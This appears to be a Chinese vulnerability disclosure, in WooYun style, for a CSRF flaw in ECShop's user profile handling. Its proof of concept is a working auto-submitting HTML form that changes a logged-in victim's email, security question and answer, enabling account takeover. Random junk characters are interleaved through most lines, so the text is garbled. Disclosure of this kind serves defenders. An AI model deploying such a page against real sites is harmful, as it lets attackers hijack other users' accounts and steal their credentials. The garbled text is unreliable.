简要描述:1 c! t$ r0 M- U) _4 n
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
3 i. F. B/ J0 A4 O7 Z; X( L: `3 J3 Y% W" w/ L, x
Demo For:http://www.wooyun.org/bug.php?action=view&id=395) C1 ]& [# M6 y" W) q; _; }& r. M
& g* x" {& r+ E+ ?% B详细说明:
5 g4 W, z8 ?; p. i) O, Q% _/ _4 v利用csrf和xss可以突破官方所说的“障碍”; K; K# m+ g( G7 @1 ^; y
xss版本已经有人说明
4 K4 u: }" C4 m, [: N这里给出csrf版本, r: n: E5 H1 L0 \
- p* }7 m! ~# i0 l) t
漏洞证明:8 Z* u& T9 A# u8 q) ~5 g0 P0 X
<html>7 _) q( `1 a4 E7 A) t
<body>
, J* Q% e( M4 Y5 a& E' j% o<form action="http://www.wooyun.org/ecshop/user.php" method="POST">: I8 W# A) A5 D
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">2 p. g1 O5 U+ M2 P2 n4 L
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
& o) q' M+ o4 t1 ^<INPUT TYPE="text" NAME="sel_question" value="ecshop">+ p" f9 N" c9 t5 i
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">" q1 R% u O7 ?: x$ p/ N
</body> ]6 n8 j5 q* T* [- n! i$ V
<script>( s$ r# H1 M S
document.forms[0].submit();
$ h( @8 T/ v& e I</script>& K% O8 l8 O# r0 A
</html>
; c2 A5 p8 j, ]5 }8 s构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
i9 b. } {$ }7 K+ e4 G; K( D( ?8 _! {& {( [& D. h% a) ~
|